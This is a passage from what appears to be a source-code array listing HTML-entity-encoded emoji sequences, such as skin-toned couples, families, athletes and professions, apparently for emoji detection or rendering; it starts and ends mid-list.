'&#x1f468;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f468;&#x200d;&#x1f468;&#x200d;&#x1f466;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f468;&#x200d;&#x1f467;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f468;&#x200d;&#x1f467;&#x200d;&#x1f467;', '&#x1f468;&#x200d;&#x1f469;&#x200d;&#x1f466;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f469;&#x200d;&#x1f467;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f469;&#x200d;&#x1f467;&#x200d;&#x1f467;', '&#x1f469;&#x200d;&#x1f469;&#x200d;&#x1f466;&#x200d;&#x1f466;', '&#x1f469;&#x200d;&#x1f469;&#x200d;&#x1f467;&#x200d;&#x1f466;', '&#x1f469;&#x200d;&#x1f469;&#x200d;&#x1f467;&#x200d;&#x1f467;', '&#x1f468;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;', '&#x1f469;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;', '&#x1f469;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;', '&#x1faf1;&#x1f3fb;&#x200d;&#x1faf2;&#x1f3fc;', '&#x1faf1;&#x1f3fb;&#x200d;&#x1faf2;&#x1f3fd;', '&#x1faf1;&#x1f3fb;&#x200d;&#x1faf2;&#x1f3fe;', '&#x1faf1;&#x1f3fb;&#x200d;&#x1faf2;&#x1f3ff;', '&#x1faf1;&#x1f3fc;&#x200d;&#x1faf2;&#x1f3fb;', '&#x1faf1;&#x1f3fc;&#x200d;&#x1faf2;&#x1f3fd;', '&#x1faf1;&#x1f3fc;&#x200d;&#x1faf2;&#x1f3fe;', '&#x1faf1;&#x1f3fc;&#x200d;&#x1faf2;&#x1f3ff;', '&#x1faf1;&#x1f3fd;&#x200d;&#x1faf2;&#x1f3fb;', '&#x1faf1;&#x1f3fd;&#x200d;&#x1faf2;&#x1f3fc;', '&#x1faf1;&#x1f3fd;&#x200d;&#x1faf2;&#x1f3fe;', '&#x1faf1;&#x1f3fd;&#x200d;&#x1faf2;&#x1f3ff;', '&#x1faf1;&#x1f3fe;&#x200d;&#x1faf2;&#x1f3fb;', '&#x1faf1;&#x1f3fe;&#x200d;&#x1faf2;&#x1f3fc;', '&#x1faf1;&#x1f3fe;&#x200d;&#x1faf2;&#x1f3fd;', '&#x1faf1;&#x1f3fe;&#x200d;&#x1faf2;&#x1f3ff;', '&#x1faf1;&#x1f3ff;&#x200d;&#x1faf2;&#x1f3fb;', '&#x1faf1;&#x1f3ff;&#x200d;&#x1faf2;&#x1f3fc;', '&#x1faf1;&#x1f3ff;&#x200d;&#x1faf2;&#x1f3fd;', '&#x1faf1;&#x1f3ff;&#x200d;&#x1faf2;&#x1f3fe;', '&#x1f468;&#x200d;&#x1f466;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f467;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f467;&#x200d;&#x1f467;', '&#x1f468;&#x200d;&#x1f468;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f468;&#x200d;&#x1f467;', '&#x1f468;&#x200d;&#x1f469;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f469;&#x200d;&#x1f467;', '&#x1f469;&#x200d;&#x1f466;&#x200d;&#x1f466;', '&#x1f469;&#x200d;&#x1f467;&#x200d;&#x1f466;', '&#x1f469;&#x200d;&#x1f467;&#x200d;&#x1f467;', '&#x1f469;&#x200d;&#x1f469;&#x200d;&#x1f466;', '&#x1f469;&#x200d;&#x1f469;&#x200d;&#x1f467;', '&#x1f9d1;&#x200d;&#x1f91d;&#x200d;&#x1f9d1;', '&#x1f3c3;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c3;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c3;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c3;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c3;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c3;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c3;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c3;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c3;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c3;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c4;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c4;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c4;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c4;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c4;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c4;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c4;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c4;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c4;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c4;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f3ca;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f3ca;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f3ca;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f3ca;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f3ca;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f3ca;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f3ca;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f3ca;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f3ca;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f3ca;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cb;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cb;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cb;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cb;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cb;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cb;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cb;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cb;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cb;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cb;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cc;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cc;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cc;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cc;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cc;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cc;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cc;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cc;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cc;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cc;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f468;&#x1f3fb;&#x200d;&#x2695;&#xfe0f;', '&#x1f468;&#x1f3fb;&#x200d;&#x2696;&#xfe0f;', '&#x1f468;&#x1f3fb;&#x200d;&#x2708;&#xfe0f;', '&#x1f468;&#x1f3fc;&#x200d;&#x2695;&#xfe0f;', '&#x1f468;&#x1f3fc;&#x200d;&#x2696;&#xfe0f;', '&#x1f468;&#x1f3fc;&#x200d;&#x2708;&#xfe0f;', '&#x1f468;&#x1f3fd;&#x200d;&#x2695;&#xfe0f;', '&#x1f468;&#x1f3fd;&#x200d;&#x2696;&#xfe0f;', '&#x1f468;&#x1f3fd;&#x200d;&#x2708;&#xfe0f;', '&#x1f468;&#x1f3fe;&#x200d;&#x2695;&#xfe0f;', '&#x1f468;&#x1f3fe;&#x200d;&#x2696;&#xfe0f;', '&#x1f468;&#x1f3fe;&#x200d;&#x2708;&#xfe0f;', '&#x1f468;&#x1f3ff;&#x200d;&#x2695;&#xfe0f;', '&#x1f468;&#x1f3ff;&#x200d;&#x2696;&#xfe0f;', '&#x1f468;&#x1f3ff;&#x200d;&#x2708;&#xfe0f;', '&#x1f469;&#x1f3fb;&#x200d;&#x2695;&#xfe0f;', '&#x1f469;&#x1f3fb;&#x200d;&#x2696;&#xfe0f;', '&#x1f469;&#x1f3fb;&#x200d;&#x2708;&#xfe0f;', '&#x1f469;&#x1f3fc;&#x200d;&#x2695;&#xfe0f;', '&#x1f469;&#x1f3fc;&#x200d;&#x2696;&#xfe0f;', '&#x1f469;&#x1f3fc;&#x200d;&#x2708;&#xfe0f;', '&#x1f469;&#x1f3fd;&#x200d;&#x2695;&#xfe0f;', '&#x1f469;&#x1f3fd;&#x200d;&#x2696;&#xfe0f;', '&#x1f469;&#x1f3fd;&#x200d;&#x2708;&#xfe0f;', '&#x1f469;&#x1f3fe;&#x200d;&#x2695;&#xfe0f;', '&#x1f469;&#x1f3fe;&#x200d;&#x2696;&#xfe0f;', '&#x1f469;&#x1f3fe;&#x200d;&#x2708;&#xfe0f;', '&#x1f469;&#x1f3ff;&#x200d;&#x2695;&#xfe0f;', '&#x1f469;&#x1f3ff;&#x200d;&#x2696;&#xfe0f;', '&#x1f469;&#x1f3ff;&#x200d;&#x2708;&#xfe0f;', '&#x1f46e;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f46e;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f46e;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f46e;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f46e;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f46e;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f46e;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f46e;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f46e;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f46e;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f470;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f470;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f470;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f470;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f470;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f470;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f470;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f470;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f470;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f470;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f471;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f471;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f471;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f471;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f471;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f471;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f471;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f471;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f471;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f471;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f473;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f473;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f473;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f473;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f473;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f473;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f473;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f473;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f473;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f473;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f477;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f477;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f477;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f477;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f477;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f477;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f477;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f477;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f477;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f477;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f481;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f481;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f481;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f481;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f481;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f481;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f481;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f481;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f481;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f481;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f482;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f482;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f482;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f482;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f482;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f482;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f482;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f482;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f482;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f482;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f486;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f486;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f486;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f486;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f486;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f486;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f486;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f486;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f486;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f486;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f487;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f487;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f487;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f487;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f487;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f487;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f487;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f487;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f487;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f487;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f574;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f574;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f574;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f574;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f574;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f574;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f574;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f574;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f574;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f574;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f575;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f575;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f575;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f575;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f575;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f575;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f575;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f575;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f575;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f575;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f645;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f645;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f645;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f645;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f645;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f645;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f645;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f645;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f645;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f645;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f646;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f646;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f646;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f646;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f646;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f646;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f646;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f646;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f646;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f646;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f647;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f647;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f647;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f647;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f647;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f647;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f647;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f647;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f647;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f647;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f64b;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f64b;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f64b;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f64b;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f64b;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f64b;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f64b;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f64b;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f64b;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f64b;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f64d;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f64d;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f64d;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', 